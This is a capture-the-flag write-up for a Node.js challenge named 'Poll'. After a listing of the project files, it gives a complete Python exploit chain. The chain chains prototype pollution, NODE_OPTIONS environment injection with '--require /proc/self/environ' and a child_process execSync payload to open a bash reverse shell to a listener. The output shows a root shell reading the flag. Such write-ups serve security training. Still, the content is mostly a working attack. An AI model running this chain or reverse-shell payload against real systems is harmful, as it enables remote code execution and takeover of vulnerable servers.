POLL

​Project​
Structure
poll/
├── docker
│   └── node
│       └── Dockerfile
├── docker-compose.yml
└── src
    ├── app.js
    ├── config.js
    ├── flag.txt
    ├── package.json
    ├── package-lock.json
    ├── static
    │   ├── bootstrap
    │   │   └── css
    │   │       └── bootstrap.min.css
    │   ├── css
    │   │   └── Lightbox-Gallery.css
    │   ├── img
    │   │   ├── about-bg.jpg
    │   │   ├── admin-bg.jpg
    │   │   ├── contact-bg.jpg
    │   │   ├── Fword-CTF-bakground.png
    │   │   ├── home-bg.jpg
    │   │   ├── index-bg.jpg
    │   │   ├── login-bg.png
    │   │   ├── naruto.png
    │   │   ├── register-bg.jpg
    │   │   ├── Wallpaper Subaru Natsuki, Zero, 4K, 5K, Art 6507310401.jpg
    │   │   ├── wp2349778-kuroko-tetsuya-wallpapers.jpg
    │   │   └── wp3754599-hinata-shy-wallpapers.jpg
    │   └── js
    │       └── clean-blog.js
    └── views
        ├── admin.ejs
        ├── animes.ejs
        ├── home.ejs
        ├── index.ejs
        ├── login.ejs
        ├── register.ejs
        └── update.ejs
​
Solution
Install pip
sudo apt install python3-pip
Install requests
python3 -m pip install requests
Start Netcat listener
nc -lnvp 8443
Exploit
from requests import Session
​
host = '127.0.0.1'
port = '1234'
​
session = Session()
session.proxies = {'http': '127.0.0.1:8080'}
​
payload = {
    'username':'diefunction',
    'password': 'diefunction',
    'anime': 'Bleach'
}
session.post(f'http://{host}:{port}/register', json = payload)
​
payload = {
    'username':'diefunction',
    'password': 'diefunction'
}
session.post(f'http://{host}:{port}/login', json = payload)
​
payload = {
    'constructor[name][constructor][lucky]': '1',
    'luck': '1'
}
session.get(f'http://{host}:{port}/update', params = payload)
​
payload = {
    'envname': 'NODE_OPTIONS',
    'env': '--require /proc/self/environ',
    'path': '/data/config.js'
}
session.post(f'http://{host}:{port}/admin', json = payload)
​
code = "'';require('child_process').execSync('/bin/bash -c \\\'/bin/bash -i >& /dev/tcp/172.17.0.1/8443 0>&1\\\'');//"
payload = {
    'envname': 'NODE_VERSION',
    'env': f'{code}',
    'path': '/data/package.json'
}
session.post(f'http://{host}:{port}/admin', json = payload)
Run the script
python3 exploit.py
Output
writeup@ubuntu:~/Desktop/athack-ctf/poll$ nc -lnvp 8443
Listening on 0.0.0.0 8443
Connection received on 172.18.0.3 46818
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c56a8d29b3fb:/data# cat /flag.txt
cat /flag.txt
AtHackCTF{Dummy_Flag}
root@c56a8d29b3fb:/data# 
Last modified 1yr ago
POLL

​Project​

Structure

Solution

Project
